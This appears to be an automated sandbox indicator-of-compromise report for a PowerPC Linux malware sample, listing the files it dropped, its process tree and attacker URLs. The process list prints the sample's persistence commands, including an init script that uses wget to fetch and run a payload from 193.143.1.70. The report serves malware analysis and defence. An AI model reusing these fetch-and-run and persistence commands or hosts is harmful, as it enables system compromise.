IOC Report
powerpc.nn.elf


Files

File Path | Type | Category | Malicious
powerpc.nn.elf | ELF 32-bit MSB executable, PowerPC or cisco 4500, version 1 (SYSV), statically linked, stripped | initial sample | malicious
/etc/init.d/powerpc.nn.elf | POSIX shell script, ASCII text executable | dropped | malicious
/etc/init.d/system | POSIX shell script, ASCII text executable | dropped | malicious
/etc/profile | ASCII text | dropped | malicious
/etc/rc.local | POSIX shell script, ASCII text executable | dropped | malicious
/boot/bootcmd | ASCII text | dropped |
/etc/inittab | ASCII text | dropped |
/etc/motd | ASCII text | dropped |
/etc/systemd/system/custom.service | ASCII text | dropped |
/memfd:snapd-env-generator (deleted) | ASCII text | dropped |
/run/user/127/dconf/user | very short file (no magic) | dropped |
/tmp/qemu-open.ifyKlD (deleted) | data | dropped |

Processes

Path | Cmdline | Malicious
/tmp/powerpc.nn.elf | /tmp/powerpc.nn.elf |
/tmp/powerpc.nn.elf | - |
/tmp/powerpc.nn.elf | - |
/bin/sh | sh -c "systemctl enable custom.service >/dev/null 2>&1" |
/bin/sh | - |
/usr/bin/systemctl | systemctl enable custom.service |
/tmp/powerpc.nn.elf | - |
/bin/sh | sh -c "chmod +x /etc/init.d/system >/dev/null 2>&1" |
/bin/sh | - |
/usr/bin/chmod | chmod +x /etc/init.d/system |
/tmp/powerpc.nn.elf | - |
/bin/sh | sh -c "ln -s /etc/init.d/system /etc/rcS.d/S99system >/dev/null 2>&1" |
/bin/sh | - |
/usr/bin/ln | ln -s /etc/init.d/system /etc/rcS.d/S99system |
/tmp/powerpc.nn.elf | - |
/bin/sh | sh -c "echo \"#!/bin/sh\n# /etc/init.d/powerpc.nn.elf\n\ncase \\\"$1\\\" in\n start)\n echo 'Starting powerpc.nn.elf'\n /tmp/powerpc.nn.elf &\n wget http://193.143.1.70/ -O /tmp/lol.sh\n chmod +x /tmp/lol.sh\n /tmp/lol.sh &\n ;;\n stop)\n echo 'Stopping powerpc.nn.elf'\n killall powerpc.nn.elf\n ;;\n restart)\n $0 stop\n $0 start\n ;;\n *)\n echo \\\"Usage: $0 {start|stop|restart}\\\"\n exit 1\n ;;\nesac\nexit 0\" > /etc/init.d/powerpc.nn.elf" |
/tmp/powerpc.nn.elf | - |
/bin/sh | sh -c "chmod +x /etc/init.d/powerpc.nn.elf >/dev/null 2>&1" |
/bin/sh | - |
/usr/bin/chmod | chmod +x /etc/init.d/powerpc.nn.elf |
/tmp/powerpc.nn.elf | - |
/bin/sh | sh -c "mkdir -p /etc/rc.d >/dev/null 2>&1" |
/bin/sh | - |
/usr/bin/mkdir | mkdir -p /etc/rc.d |
/tmp/powerpc.nn.elf | - |
/bin/sh | sh -c "ln -s /etc/init.d/powerpc.nn.elf /etc/rc.d/S99powerpc.nn.elf >/dev/null 2>&1" |
/bin/sh | - |
/usr/bin/ln | ln -s /etc/init.d/powerpc.nn.elf /etc/rc.d/S99powerpc.nn.elf |
/tmp/powerpc.nn.elf | - |
/tmp/powerpc.nn.elf | - |
/tmp/powerpc.nn.elf | - |
/tmp/powerpc.nn.elf | - |
/usr/lib/udisks2/udisksd | - |
/usr/sbin/dumpe2fs | dumpe2fs -h /dev/dm-0 |
/usr/lib/udisks2/udisksd | - |
/usr/sbin/dumpe2fs | dumpe2fs -h /dev/dm-0 |
/usr/libexec/gnome-session-binary | - |
/bin/sh | /bin/sh -e -u -c "export GIO_LAUNCHED_DESKTOP_FILE_PID=$$; exec \"$@\"" sh /usr/libexec/gsd-housekeeping |
/usr/libexec/gsd-housekeeping | /usr/libexec/gsd-housekeeping |
/usr/lib/systemd/systemd | - |
/usr/lib/systemd/system-environment-generators/snapd-env-generator | /usr/lib/systemd/system-environment-generators/snapd-env-generator |
/usr/sbin/gdm3 | - |
/etc/gdm3/PrimeOff/Default | /etc/gdm3/PrimeOff/Default |
/usr/sbin/gdm3 | - |
/etc/gdm3/PrimeOff/Default | /etc/gdm3/PrimeOff/Default |
/usr/lib/udisks2/udisksd | - |
/usr/sbin/dumpe2fs | dumpe2fs -h /dev/dm-0 |
/usr/lib/udisks2/udisksd | - |
/usr/sbin/dumpe2fs | dumpe2fs -h /dev/dm-0 |
/usr/lib/udisks2/udisksd | - |
/usr/sbin/dumpe2fs | dumpe2fs -h /dev/dm-0 |
/usr/lib/udisks2/udisksd | - |
/usr/sbin/dumpe2fs | dumpe2fs -h /dev/dm-0 |
/usr/lib/udisks2/udisksd | - |
/usr/sbin/dumpe2fs | dumpe2fs -h /dev/dm-0 |

URLs

Name | IP | Malicious
http://193.143.1.70/oro1vk/usr/sbin/reboot/usr/bin/reboot/usr/sbin/shutdown/usr/bin/shutdown/usr/sbi | unknown |
http://193.143.1.70/curl.sh | unknown |
http://193.143.1.70/lol.sh | unknown |
http://193.143.1.70/ | unknown |

IPs


Memdumps
